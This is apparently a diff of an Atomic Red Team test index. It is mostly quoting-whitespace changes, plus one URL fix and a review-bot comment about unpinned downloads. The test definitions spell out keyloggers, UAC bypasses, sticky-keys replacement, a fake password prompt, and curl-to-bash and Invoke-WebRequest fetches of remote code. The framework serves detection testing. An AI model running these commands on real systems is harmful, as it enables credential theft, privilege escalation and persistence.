0)''
-'
+ '
get_prereq_command: |
if(Invoke-WebRequestVerifyHash "#{winzip_url}" "$env:Temp\winzip.exe" #{winzip_hash}){
Write-Host Follow the installation prompts to continue
@@ -8141,7 +8141,7 @@ collection:
auto_generated_guid: d1334303-59cb-4a03-8313-b3e24d02c198
description: 'Note: Requires 7zip installation
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -8156,10 +8156,10 @@ collection:
dependencies:
- description: '7zip tool must be installed at specified location (#{7zip_exe})
-'
+ '
prereq_command: 'if not exist "#{7zip_exe}" (exit /b 1)
-'
+ '
get_prereq_command: |
echo Downloading 7-zip installer
bitsadmin /transfer myDownloadJob /download /priority normal "https://www.7-zip.org/a/7z2002-x64.exe" #{7zip_installer}
@@ -8178,7 +8178,7 @@ collection:
description: 'An adversary may compress data (e.g., sensitive documents) that
is collected prior to exfiltration. This test uses standard zip compression.
-'
+ '
supported_platforms:
- linux
- macos
@@ -8195,11 +8195,11 @@ collection:
dependencies:
- description: 'Files to zip must exist (#{input_files})
-'
+ '
prereq_command: 'if [ $(ls #{input_files} | wc -l) > 0 ] && [ -x $(which zip)
] ; then exit 0; else exit 1; fi;
-'
+ '
get_prereq_command: |
(which yum && yum -y install epel-release zip)||(which apt-get && apt-get install -y zip)
echo Please set input_files argument to include files that exist
@@ -8208,16 +8208,16 @@ collection:
elevation_required: false
command: 'zip #{output_file} #{input_files}
-'
+ '
cleanup_command: 'rm -f #{output_file}
-'
+ '
- name: Data Compressed - nix - gzip Single File
auto_generated_guid: cde3c2af-3485-49eb-9c1f-0ed60e9cc0af
description: 'An adversary may compress data (e.g., sensitive documents) that
is collected prior to exfiltration. This test uses standard gzip compression.
-'
+ '
supported_platforms:
- linux
- macos
@@ -8237,16 +8237,16 @@ collection:
command: 'test -e #{input_file} && gzip -k #{input_file} || (echo ''#{input_content}''
>> #{input_file}; gzip -k #{input_file})
-'
+ '
cleanup_command: 'rm -f #{input_file}.gz
-'
+ '
- name: Data Compressed - nix - tar Folder or File
auto_generated_guid: 7af2b51e-ad1c-498c-aca8-d3290c19535a
description: 'An adversary may compress data (e.g., sensitive documents) that
is collected prior to exfiltration. This test uses standard gzip compression.
-'
+ '
supported_platforms:
- linux
- macos
@@ -8262,28 +8262,28 @@ collection:
dependencies:
- description: 'Folder to zip must exist (#{input_file_folder})
-'
+ '
prereq_command: 'test -e #{input_file_folder}
-'
+ '
get_prereq_command: 'echo Please set input_file_folder argument to a folder
that exists
-'
+ '
executor:
name: sh
elevation_required: false
command: 'tar -cvzf #{output_file} #{input_file_folder}
-'
+ '
cleanup_command: 'rm -f #{output_file}
-'
+ '
- name: Data Encrypted with zip and gpg symmetric
auto_generated_guid: '0286eb44-e7ce-41a0-b109-3da516e05a5f'
description: 'Encrypt data for exiltration
-'
+ '
supported_platforms:
- macos
- linux
@@ -8306,7 +8306,7 @@ collection:
prereq_command: 'if [ ! -x "$(command -v gpg)" ] || [ ! -x "$(command -v zip)"
]; then exit 1; fi;
-'
+ '
get_prereq_command: "(which yum && yum -y install epel-release zip gpg)||(which
apt-get && apt-get install -y zip gpg)\n"
executor:
@@ -8320,7 +8320,7 @@ collection:
ls -l #{test_folder}
cleanup_command: 'rm -Rf #{test_folder}
-'
+ '
T1123:
technique:
object_marking_refs:
@@ -8370,7 +8370,7 @@ collection:
executor:
command: 'powershell.exe -Command WindowsAudioDevice-Powershell-Cmdlet
-'
+ '
name: powershell
- name: Registry artefact when application use microphone
auto_generated_guid: 7a21cce2-6ada-4f7c-afd9-e1e9c481e44a
@@ -8384,7 +8384,7 @@ collection:
cleanup_command: 'reg DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\microphone\NonPackaged\C:#Windows#Temp#atomic.exe
/f
-'
+ '
name: command_prompt
T1119:
technique:
@@ -8454,7 +8454,7 @@ collection:
for /R c: %f in (*.docx) do copy %f %temp%\T1119_command_prompt_collection
cleanup_command: 'del %temp%\T1119_command_prompt_collection /F /Q >nul 2>&1
-'
+ '
name: command_prompt
- name: Automated Collection PowerShell
auto_generated_guid: 634bd9b9-dc83-4229-b19f-7f83ba9ad313
@@ -8470,7 +8470,7 @@ collection:
cleanup_command: 'Remove-Item $env:TEMP\T1119_powershell_collection -Force
-ErrorAction Ignore | Out-Null
-'
+ '
name: powershell
- name: Recon information for export with PowerShell
auto_generated_guid: c3f6d794-50dd-482f-b640-0384fbb7db26
@@ -8619,7 +8619,7 @@ collection:
auto_generated_guid: 0cd14633-58d4-4422-9ede-daa2c9474ae7
description: 'Add data to clipboard to copy off or execute commands from.
-'
+ '
supported_platforms:
- windows
executor:
@@ -8629,14 +8629,14 @@ collection:
clip < %temp%\T1115.txt
cleanup_command: 'del %temp%\T1115.txt >nul 2>&1
-'
+ '
name: command_prompt
- name: Execute Commands from Clipboard using PowerShell
auto_generated_guid: d6dc21af-bec9-4152-be86-326b6babd416
description: 'Utilize PowerShell to echo a command to clipboard and execute
it
-'
+ '
supported_platforms:
- windows
executor:
@@ -8659,7 +8659,7 @@ collection:
description: 'This module copies the data stored in the user''s clipboard and
writes it to a file, $env:TEMP\atomic_T1115_clipboard_data.txt
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -8671,7 +8671,7 @@ collection:
dependencies:
- description: 'Microsoft #{ms_product} must be installed
-'
+ '
prereq_command: |
try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
@@ -8682,7 +8682,7 @@ collection:
get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
manually to meet this requirement"
-'
+ '
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
@@ -8692,7 +8692,7 @@ collection:
cleanup_command: 'Remove-Item "$env:TEMP\atomic_T1115_clipboard_data.txt"
-ErrorAction Ignore
-'
+ '
name: powershell
T1213.003:
technique:
@@ -8891,7 +8891,7 @@ collection:
auto_generated_guid: de1934ea-1fbf-425b-8795-65fb27dd7e33
description: 'Hooks functions in PowerShell to read TLS Communications
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -8907,10 +8907,10 @@ collection:
dependencies:
- description: 'T1056.004x64.dll must exist on disk at specified location (#{file_name})
-'
+ '
prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1056.004/bin/T1056.004x64.dll" -OutFile "#{file_name}" -UseBasicParsing
@@ -9283,23 +9283,23 @@ collection:
dependencies:
- description: 'Administrative share must exist on #{remote}
-'
+ '
prereq_command: 'if (Test-Path "\\#{remote}\C$") {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Write-Host ''Please Enable "C$" share on #{remote}''
-'
+ '
- description: '"\\#{remote}\C$\#{share_file}" must exist on #{remote}
-'
+ '
prereq_command: 'if (Test-Path "\\#{remote}\C$\#{share_file}") {exit 0} else
{exit 1}
-'
+ '
get_prereq_command: 'Out-File -FilePath "\\#{remote}\C$\#{share_file}"
-'
+ '
executor:
command: copy \\#{remote}\C$\#{share_file} %TEMP%\#{local_file}
cleanup_command: |-
@@ -9331,23 +9331,23 @@ collection:
dependencies:
- description: 'Administrative share must exist on #{remote}
-'
+ '
prereq_command: 'if (Test-Path "\\#{remote}\C$") {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Write-Host ''Please Enable "C$" share on #{remote}''
-'
+ '
- description: '"\\#{remote}\C$\#{share_file}" must exist on #{remote}
-'
+ '
prereq_command: 'if (Test-Path "\\#{remote}\C$\#{share_file}") {exit 0} else
{exit 1}
-'
+ '
get_prereq_command: 'Out-File -FilePath "\\#{remote}\C$\#{share_file}"
-'
+ '
executor:
command: copy-item -Path "\\#{remote}\C$\#{share_file}" -Destination "$Env:TEMP\#{local_file}"
cleanup_command: |-
@@ -9608,7 +9608,7 @@ collection:
to apply changes." & return & return default answer "" with icon 1 with
hidden answer with title "Software Update"''
-'
+ '
name: bash
- name: PowerShell - Prompt User for Password
auto_generated_guid: 2b162bfd-0928-4d4c-9ec3-4d9f88374b52
@@ -9779,7 +9779,7 @@ collection:
.\T1056.001\src\Get-Keystrokes.ps1 -LogPath #{filepath}
cleanup_command: 'Remove-Item $env:TEMP\key.log -ErrorAction Ignore
-'
+ '
name: powershell
elevation_required: true
- name: Living off the land Terminal Input Capture on Linux with pam.d
@@ -9798,14 +9798,14 @@ collection:
dependencies:
- description: 'Checking if pam_tty_audit.so is installed
-'
+ '
prereq_command: 'test -f ''/usr/lib/pam/pam_tty_audit.so -o /usr/lib64/security/pam_tty_audit.so''
-'
+ '
get_prereq_command: 'echo "Sorry, you must install module pam_tty_audit.so
and recompile, for this test to work"
-'
+ '
supported_platforms:
- linux
executor:
@@ -9836,14 +9836,14 @@ collection:
- description: 'This test requires to be run in a bash shell and that logger
and tee are installed.
-'
+ '
prereq_command: |
if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi
if [ ! -x "$(command -v logger)" ]; then echo -e "\n***** logger NOT installed *****\n"; exit 1; fi
if [ ! -x "$(command -v tee)" ]; then echo -e "\n***** tee NOT installed *****\n"; exit 1; fi
get_prereq_command: 'echo ""
-'
+ '
executor:
name: sh
elevation_required: true
@@ -9853,7 +9853,7 @@ collection:
tail /var/log/syslog
cleanup_command: 'unset PROMPT_COMMAND
-'
+ '
- name: Bash session based keylogger
auto_generated_guid: 7f85a946-a0ea-48aa-b6ac-8ff539278258
description: "When a command is executed in bash, the BASH_COMMAND variable
@@ -9870,14 +9870,14 @@ collection:
dependencies:
- description: 'This test requires to be run in a bash shell
-'
+ '
prereq_command: 'if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n*****
Bash not running! *****\n"; exit 1; fi
-'
+ '
get_prereq_command: 'echo ""
-'
+ '
input_arguments:
output_file:
name: output_file
@@ -9893,7 +9893,7 @@ collection:
cat #{output_file}
cleanup_command: 'rm #{output_file}
-'
+ '
- name: SSHD PAM keylogger
auto_generated_guid: 81d7d2ad-d644-4b6a-bea7-28ffe43becca
description: 'Linux PAM (Pluggable Authentication Modules) is used in sshd authentication.
@@ -9901,20 +9901,20 @@ collection:
of TTY input and capture all keystrokes in a ssh session and place them in
the /var/log/audit/audit.log file after the session closes.
-'
+ '
supported_platforms:
- linux
dependency_executor_name: sh
dependencies:
- description: 'This test requires sshd and auditd
-'
+ '
prereq_command: |
if [ ! -x "$(command -v sshd)" ]; then echo -e "\n***** sshd NOT installed *****\n"; exit 1; fi
if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi
get_prereq_command: 'echo ""
-'
+ '
input_arguments:
user_account:
description: Basic ssh user account for testing.
@@ -9928,7 +9928,7 @@ collection:
restart auditd\nssh #{user_account}@localhost \nwhoami\nsudo su\nwhoami\nexit\nexit\n"
cleanup_command: 'cp -fv /tmp/sshd /etc/pam.d/
-'
+ '
- name: Auditd keylogger
auto_generated_guid: a668edb9-334e-48eb-8c2e-5413a40867af
description: "The linux audit tool auditd can be used to capture 32 and 64 bit
@@ -9940,14 +9940,14 @@ collection:
dependencies:
- description: 'This test requires sshd and auditd
-'
+ '
prereq_command: 'if [ ! -x "$(command -v auditd)" ]; then echo -e "\n*****
auditd NOT installed *****\n"; exit 1; fi
-'
+ '
get_prereq_command: 'echo ""
-'
+ '
executor:
name: sh
elevation_required: true
@@ -9956,7 +9956,7 @@ collection:
$(date +\"%d/%m/%y %H:%M:%S\") \n"
cleanup_command: 'systemctl restart auditd
-'
+ '
T1557.001:
technique:
object_marking_refs:
@@ -10130,17 +10130,17 @@ collection:
command: 'Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.bat"
-OutFile #{output_file}
-'
+ '
cleanup_command: 'Remove-Item -Force #{output_file} -ErrorAction Ignore
-'
+ '
name: powershell
- name: Stage data from Discovery.sh
auto_generated_guid: 39ce0303-ae16-4b9e-bb5b-4f53e8262066
description: 'Utilize curl to download discovery.sh and execute a basic information
gathering shell script
-'
+ '
supported_platforms:
- linux
- macos
@@ -10153,7 +10153,7 @@ collection:
command: 'curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh
| bash -s > #{output_file}
-'
+ '
name: bash
- name: Zip a Folder with PowerShell for Staging in Temp
auto_generated_guid: a57fbe4b-3440-452a-88a7-943531ac872a
@@ -10175,10 +10175,10 @@ collection:
command: 'Compress-Archive -Path #{input_file} -DestinationPath #{output_file}
-Force
-'
+ '
cleanup_command: 'Remove-Item -Path #{output_file} -ErrorAction Ignore
-'
+ '
name: powershell
T1114.001:
technique:
@@ -10249,23 +10249,23 @@ collection:
dependencies:
- description: 'Get-Inbox.ps1 must be located at #{file_path}
-'
+ '
prereq_command: 'if (Test-Path #{file_path}\Get-Inbox.ps1) {exit 0} else {exit
1}
-'
- get_prereq_command: 'Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/src/Get-Inbox.ps1"
+ '
+ get_prereq_command: 'Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1114.001/src/Get-Inbox.ps1"
-OutFile "#{file_path}\Get-Inbox.ps1"
-'
+ '
executor:
command: 'powershell -executionpolicy bypass -command #{file_path}\Get-Inbox.ps1
-file #{output_file}
-'
+ '
cleanup_command: 'Remove-Item #{output_file} -Force -ErrorAction Ignore
-'
+ '
name: powershell
T1602.002:
technique:
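Review bot: The corrected raw URL on the new `get_prereq_command` line still fetches Get-Inbox.ps1 from the mutable `master` branch and writes it straight to `#{file_path}\Get-Inbox.ps1` with no integrity check, while the `command` line two entries below runs that file with `-executionpolicy bypass`. Pinning the URL to a commit SHA, or verifying the download before it is used, e.g. `if ((Get-FileHash "#{file_path}\Get-Inbox.ps1").Hash -ne '<EXPECTED_SHA256_PLACEHOLDER>') { Remove-Item "#{file_path}\Get-Inbox.ps1"; exit 1 }`, would make the prerequisite reproducible and surface a changed or tampered script. The other prerequisite downloads in this diff (the T1056.004, T1546.010, T1546.011, T1574.012, T1055.001 and T1574.002 binary fetches) follow the same unpinned pattern, so the same point applies there. If this index is regenerated from the per-technique atomic YAML, the URL fix also needs to land in the T1114.001 source definition, or the next regeneration will reintroduce the blob URL.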
@@ -10495,7 +10495,7 @@ collection:
or screencapture.(Citation: CopyFromScreen .NET)(Citation: Antiquated
Mac Malware)
-'
+ '
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
kill_chain_phases:
@@ -10530,7 +10530,7 @@ collection:
auto_generated_guid: 0f47ceb1-720f-4275-96b8-21f0562217ac
description: 'Use screencapture command to collect a full desktop screenshot
-'
+ '
supported_platforms:
- macos
input_arguments:
@@ -10541,16 +10541,16 @@ collection:
executor:
command: 'screencapture #{output_file}
-'
+ '
cleanup_command: 'rm #{output_file}
-'
+ '
name: bash
- name: Screencapture (silent)
auto_generated_guid: deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4
description: 'Use screencapture command to collect a full desktop screenshot
-'
+ '
supported_platforms:
- macos
input_arguments:
@@ -10561,17 +10561,17 @@ collection:
executor:
command: 'screencapture -x #{output_file}
-'
+ '
cleanup_command: 'rm #{output_file}
-'
+ '
name: bash
- name: X Windows Capture
auto_generated_guid: 8206dd0c-faf6-4d74-ba13-7fbe13dce6ac
description: 'Use xwd command to collect a full desktop screenshot and review
file with xwud
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -10593,11 +10593,11 @@ collection:
dependencies:
- description: 'Package with XWD and XWUD must exist on device
-'
+ '
prereq_command: 'if #{package_checker} > /dev/null; then exit 0; else exit
1; fi
-'
+ '
get_prereq_command: "sudo #{package_installer} \n"
executor:
command: |
@@ -10605,14 +10605,14 @@ collection:
xwud -in #{output_file}
cleanup_command: 'rm #{output_file}
-'
+ '
name: bash
- name: Capture Linux Desktop using Import Tool
auto_generated_guid: 9cd1cccb-91e4-4550-9139-e20a586fcea1
description: 'Use import command from ImageMagick to collect a full desktop
screenshot
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -10623,28 +10623,28 @@ collection:
dependencies:
- description: 'ImageMagick must be installed
-'
+ '
prereq_command: 'if import -help > /dev/null 2>&1; then exit 0; else exit
1; fi
-'
+ '
get_prereq_command: 'sudo apt install graphicsmagick-imagemagick-compat
-'
+ '
executor:
command: 'import -window root #{output_file}
-'
+ '
cleanup_command: 'rm #{output_file}
-'
+ '
name: bash
- name: Windows Screencapture
auto_generated_guid: 3c898f62-626c-47d5-aad2-6de873d69153
description: 'Use Psr.exe binary to collect screenshots of user display. Test
will do left mouse click to simulate user behaviour
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -10666,7 +10666,7 @@ collection:
cmd /c "timeout #{recording_time} > NULL && psr.exe /stop"
cleanup_command: 'rm #{output_file} -ErrorAction Ignore
-'
+ '
- name: Windows Screen Capture (CopyFromScreen)
auto_generated_guid: e9313014-985a-48ef-80d9-cde604ffc187
description: |
@@ -10690,7 +10690,7 @@ collection:
$bitmap.Save("#{output_file}")
cleanup_command: 'Remove-Item #{output_file} -ErrorAction Ignore
-'
+ '
name: powershell
T1213.002:
technique:
@@ -10807,7 +10807,7 @@ collection:
cleanup_command: 'reg DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\webcam\NonPackaged\C:#Windows#Temp#atomic.exe
/f
-'
+ '
name: command_prompt
T1056.003:
technique:
@@ -11095,7 +11095,7 @@ privilege-escalation:
description: 'Comma separated list of system binaries to which you want
to attach each #{attached_process}. Default: "osk.exe"
-'
+ '
type: String
default: osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe,
atbroker.exe
@@ -11103,7 +11103,7 @@ privilege-escalation:
description: 'Full path to process to attach to target in #{parent_list}.
Default: cmd.exe
-'
+ '
type: Path
default: C:\windows\system32\cmd.exe
executor:
@@ -11137,7 +11137,7 @@ privilege-escalation:
auto_generated_guid: 934e90cf-29ca-48b3-863c-411737ad44e3
description: 'Replace sticky keys binary (sethc.exe) with cmd.exe
-'
+ '
supported_platforms:
- windows
executor:
@@ -11148,7 +11148,7 @@ privilege-escalation:
copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
cleanup_command: 'copy /Y C:\Windows\System32\sethc_backup.exe C:\Windows\System32\sethc.exe
-'
+ '
name: command_prompt
elevation_required: true
T1547.014:
@@ -11407,11 +11407,11 @@ privilege-escalation:
- description: 'Reg files must exist on disk at specified locations (#{registry_file}
and #{registry_cleanup_file})
-'
+ '
prereq_command: 'if ((Test-Path #{registry_file}) -and (Test-Path #{registry_cleanup_file}))
{exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory (split-path #{registry_file}) -ErrorAction ignore | Out-Null
@@ -11420,11 +11420,11 @@ privilege-escalation:
- description: 'DLL''s must exist in the C:\Tools directory (T1546.010.dll and
T1546.010x86.dll)
-'
+ '
prereq_command: 'if ((Test-Path c:\Tools\T1546.010.dll) -and (Test-Path c:\Tools\T1546.010x86.dll))
{exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory C:\Tools -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/bin/T1546.010.dll" -OutFile C:\Tools\T1546.010.dll
@@ -11432,10 +11432,10 @@ privilege-escalation:
executor:
command: 'reg.exe import #{registry_file}
-'
+ '
cleanup_command: 'reg.exe import #{registry_cleanup_file} >nul 2>&1
-'
+ '
name: command_prompt
elevation_required: true
T1546.011:
@@ -11543,31 +11543,31 @@ privilege-escalation:
- description: 'Shim database file must exist on disk at specified location
(#{file_path})
-'
+ '
prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory (split-path #{file_path}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicShimx86.sdb" -OutFile "#{file_path}"
- description: 'AtomicTest.dll must exist at c:\Tools\AtomicTest.dll
-'
+ '
prereq_command: 'if (Test-Path c:\Tools\AtomicTest.dll) {exit 0} else {exit
1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path c:\Tools\AtomicTest.dll) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicTest.dll" -OutFile c:\Tools\AtomicTest.dll
executor:
command: 'sdbinst.exe #{file_path}
-'
+ '
cleanup_command: 'sdbinst.exe -u #{file_path} >nul 2>&1
-'
+ '
name: command_prompt
elevation_required: true
- name: New shim database files created in the default shim database directory
@@ -11780,7 +11780,7 @@ privilege-escalation:
description: 'This test submits a command to be run in the future by the `at`
daemon.
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -11796,30 +11796,30 @@ privilege-escalation:
dependencies:
- description: 'The `at` and `atd` executables must exist in the PATH
-'
+ '
prereq_command: 'which at && which atd
-'
+ '
get_prereq_command: 'echo ''Please install `at` and `atd`; they were not found
in the PATH (Package name: `at`)''
-'
+ '
- description: 'The `atd` daemon must be running
-'
+ '
prereq_command: 'systemctl status atd || service atd status
-'
+ '
get_prereq_command: 'echo ''Please start the `atd` daemon (sysv: `service
atd start` ; systemd: `systemctl start atd`)''
-'
+ '
executor:
name: sh
elevation_required: false
command: 'echo "#{at_command}" | at #{time_spec}
-'
+ '
T1053.002:
technique:
object_marking_refs:
@@ -11916,7 +11916,7 @@ privilege-escalation:
elevation_required: false
command: 'at 13:20 /interactive cmd
-'
+ '
T1547.002:
technique:
object_marking_refs:
@@ -12082,7 +12082,7 @@ privilege-escalation:
auto_generated_guid: cb01b3da-b0e7-4e24-bf6d-de5223526785
description: 'Install a driver via pnputil.exe lolbin
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -12093,7 +12093,7 @@ privilege-escalation:
executor:
command: 'pnputil.exe /add-driver "#{driver_inf}"
-'
+ '
name: command_prompt
T1037:
technique:
@@ -12263,7 +12263,7 @@ privilege-escalation:
cmd.exe /c eventvwr.msc
cleanup_command: 'reg.exe delete hkcu\software\classes\mscfile /f >nul 2>&1
-'
+ '
name: command_prompt
- name: Bypass UAC using Event Viewer (PowerShell)
auto_generated_guid: a6ce9acf-842a-4af6-8f79-539be7608e2b
@@ -12285,7 +12285,7 @@ privilege-escalation:
cleanup_command: 'Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse
-ErrorAction Ignore
-'
+ '
name: powershell
- name: Bypass UAC using Fodhelper
auto_generated_guid: 58f641ea-12e3-499a-b684-44dee46bd182
@@ -12307,7 +12307,7 @@ privilege-escalation:
cleanup_command: 'reg.exe delete hkcu\software\classes\ms-settings /f >nul
2>&1
-'
+ '
name: command_prompt
- name: Bypass UAC using Fodhelper - PowerShell
auto_generated_guid: 3f627297-6c38-4e7d-a278-fc2563eaaeaa
@@ -12330,7 +12330,7 @@ privilege-escalation:
cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force
-Recurse -ErrorAction Ignore
-'
+ '
name: powershell
- name: Bypass UAC using ComputerDefaults (PowerShell)
auto_generated_guid: 3c51abf2-44bf-42d8-9111-dc96ff66750f
@@ -12353,7 +12353,7 @@ privilege-escalation:
cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force
-Recurse -ErrorAction Ignore
-'
+ '
name: powershell
elevation_required: true
- name: Bypass UAC by Mocking Trusted Directories
@@ -12401,7 +12401,7 @@ privilege-escalation:
cleanup_command: 'Remove-Item -Path "HKCU:\Software\Classes\Folder" -Recurse
-Force -ErrorAction Ignore
-'
+ '
name: powershell
- name: Disable UAC using reg.exe
auto_generated_guid: 9e8af564-53ec-407e-aaa8-3cb20c3af7f9
@@ -12414,11 +12414,11 @@ privilege-escalation:
command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
/v EnableLUA /t REG_DWORD /d 0 /f
-'
+ '
cleanup_command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
/v EnableLUA /t REG_DWORD /d 1 /f
-'
+ '
name: command_prompt
elevation_required: true
- name: Bypass UAC using SilentCleanup task
@@ -12465,7 +12465,7 @@ privilege-escalation:
dependencies:
- description: 'UACME executable must exist on disk at specified location (#{uacme_exe})
-'
+ '
prereq_command: |
$tempPath = cmd /c echo #{uacme_exe}
if (Test-Path "$tempPath") {exit 0} else {exit 1}
@@ -12476,7 +12476,7 @@ privilege-escalation:
executor:
command: '"#{uacme_exe}"
-'
+ '
cleanup_command: |
powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
@@ -12501,7 +12501,7 @@ privilege-escalation:
dependencies:
- description: 'UACME executable must exist on disk at specified location (#{uacme_exe})
-'
+ '
prereq_command: |
$tempPath = cmd /c echo #{uacme_exe}
if (Test-Path "$tempPath") {exit 0} else {exit 1}
@@ -12512,7 +12512,7 @@ privilege-escalation:
executor:
command: '"#{uacme_exe}"
-'
+ '
cleanup_command: |
powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
@@ -12536,7 +12536,7 @@ privilege-escalation:
dependencies:
- description: 'UACME executable must exist on disk at specified location (#{uacme_exe})
-'
+ '
prereq_command: |
$tempPath = cmd /c echo #{uacme_exe}
if (Test-Path "$tempPath") {exit 0} else {exit 1}
@@ -12547,7 +12547,7 @@ privilege-escalation:
executor:
command: '"#{uacme_exe}"
-'
+ '
cleanup_command: |
powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
@@ -12572,7 +12572,7 @@ privilege-escalation:
dependencies:
- description: 'UACME executable must exist on disk at specified location (#{uacme_exe})
-'
+ '
prereq_command: |
$tempPath = cmd /c echo #{uacme_exe}
if (Test-Path "$tempPath") {exit 0} else {exit 1}
@@ -12583,7 +12583,7 @@ privilege-escalation:
executor:
command: '"#{uacme_exe}"
-'
+ '
cleanup_command: |
powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
@@ -12607,7 +12607,7 @@ privilege-escalation:
dependencies:
- description: 'UACME executable must exist on disk at specified location (#{uacme_exe})
-'
+ '
prereq_command: |
$tempPath = cmd /c echo #{uacme_exe}
if (Test-Path "$tempPath") {exit 0} else {exit 1}
@@ -12618,7 +12618,7 @@ privilege-escalation:
executor:
command: '"#{uacme_exe}"
-'
+ '
cleanup_command: |
powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
@@ -12642,7 +12642,7 @@ privilege-escalation:
dependencies:
- description: 'UACME executable must exist on disk at specified location (#{uacme_exe})
-'
+ '
prereq_command: |
$tempPath = cmd /c echo #{uacme_exe}
if (Test-Path "$tempPath") {exit 0} else {exit 1}
@@ -12653,7 +12653,7 @@ privilege-escalation:
executor:
command: '"#{uacme_exe}"
-'
+ '
cleanup_command: |
powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
@@ -12678,7 +12678,7 @@ privilege-escalation:
dependencies:
- description: 'UACME executable must exist on disk at specified location (#{uacme_exe})
-'
+ '
prereq_command: |
$tempPath = cmd /c echo #{uacme_exe}
if (Test-Path "$tempPath") {exit 0} else {exit 1}
@@ -12689,7 +12689,7 @@ privilege-escalation:
executor:
command: '"#{uacme_exe}"
-'
+ '
cleanup_command: |
powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
@@ -12714,7 +12714,7 @@ privilege-escalation:
dependencies:
- description: 'UACME executable must exist on disk at specified location (#{uacme_exe})
-'
+ '
prereq_command: |
$tempPath = cmd /c echo #{uacme_exe}
if (Test-Path "$tempPath") {exit 0} else {exit 1}
@@ -12725,7 +12725,7 @@ privilege-escalation:
executor:
command: '"#{uacme_exe}"
-'
+ '
cleanup_command: |
powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
@@ -12839,7 +12839,7 @@ privilege-escalation:
- description: "#{file_name} must be present\n"
prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
@@ -12884,7 +12884,7 @@ privilege-escalation:
- description: "#{file_name} must be present\n"
prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
@@ -12922,7 +12922,7 @@ privilege-escalation:
- description: "#{file_name} must be present\n"
prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
